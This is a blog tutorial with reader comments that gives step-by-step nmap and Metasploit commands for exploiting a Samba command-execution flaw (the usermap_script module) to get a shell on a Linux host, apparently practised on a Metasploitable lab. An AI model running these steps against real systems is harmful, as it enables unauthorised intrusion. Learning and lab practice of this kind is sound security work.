Hacking and gaining access to Linux by exploiting SAMBA service

February 4, 2018 by V.P. Prabhakaran

Step 1

First, we need to find out the ports and services running on the target system. To find the open ports and services, the command is:

Command: nmap -sS -Pn -A

Step 2

Once you find the open ports and service like the samba port and service ready, get set for sending an exploit through that port to create a meterpreter session. To perform this attack, you need to open metasploit.

Step 3

Once you open metasploit, first we need to find the version of samba

Command: -msf> search scanner/samba

(This command used to finding the scanner parameter to find samba version)

Step 4

Once you find the scanners to find the samba version of the target, use the scanner parameter.

Command: msf> use auxiliary/scanner/smb/smb_version

(This command is used to set the scanner parameter)

Command 2: msfauxiliary(smb_version) > set RHOSTS

(This command is used to set the IPaddress of the remote host of which you need to find the version)

Command 3: exploit

Step 5

After finding the samba version, perform an attack and gain access to the linux system with the help of the Meterpertersession

Command: msf> use exploit/multi/samba/usermap_script

This is the exploit that we need to select to gain access to system

Command: msf exploit(usermap_script) > set RHOST


Posted: February 4, 2018
V.P. Prabhakaran
View Profile

V.P. Prabhakaran is a highly-experienced security pro, having more then 7 years experience as Senior Information Security Consultant at Koenig Solutions. Mr. Prabhakaran trains and provides consultancy to professionals for Computer Hacking, Forensic Security and Firewalls. He is certified in CEH, ECSA, ECSS, CHFI, EDRP ECIH, CEI, OSSTMM (OPST and OPSA) ISECOM Trainer MCT and CEI.

15 responses to “Hacking and gaining access to Linux by exploiting SAMBA service”

  1. Pousen says:

    I’d say a bit weak.
    You don’t explain which systems would be vulnerable, under which vulnerability or whether it is going to work or not.

  2. Youri says:

    Such a pussy explaination. The title should be “A beginner on how to exploit SAMBA using Backtrack”. 7 years experience should give more details. From scratch to PoC. Instead of using other’s people exploit, you should write your own. I guess you don’t have such a knowledge!

  3. i target the metasploitable lab which is used for your penetration testing skills its is only for education purpose

  4. i am very pratical guy and i jus shared the pratical in which i exploited the vulnerablity of samba 3.0
    This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication

  5. ‘@youri its not abt exp its all about the information what i am trying to exchange .don,t be rude be chill bro

  6. Prosun says:

    ‘@youri people like you are absolute crap and jelaous of others. Can never appreciate anyone’s efforts. Critisizm has to be done, but there must be some way. what can we expect from big F*** like Youri???
    @ v.p.prabhakaran keep the good work. Nice consize explanation.

  7. ‘@prosun thanks mate they don,t respect the inforamtion who delivers

  8. Ryan adams says:

    Command tips so effective and it will really help us to operating to this strategies…so thanks for blogger to sharing it. http://www.sintre.com/index.php/about-us

  9. Jose Marquez says:

    It was a good read and I appreciate the information exchange!!! Keep it up, you do have a fan or two

  10. Vladmir says:

    It’s easy to talk bad things about others and forget your own ass…
    Prabahakaran Nair shared a very important knowledge about a vulnerability in samba and you guys return with
    offensive words there’s no even respect for others, I would say thanks for sharing this with us and don’t worry about those ” PACOVIOS “

  11. saati says:

    I followed each and every step mentioned above in a virtual environment but i,m unable exploit .
    At last step it showing message like
    Exploit completed but no session created.

    Please help me in this.

  12. prabh says:

    ‘@sati will u using metasploitable lab ?

  13. Mel says:

    Hi my version is Samba is 2.2.3a and i ran exactly like mentioned above . It says started reverse double handler and then just stops . Can you tell what the problem is?


  14. charit says:

    Hi Sir, How can we do it without metasploit, like by running a exploit manually

Leave a Reply

Your email address will not be published.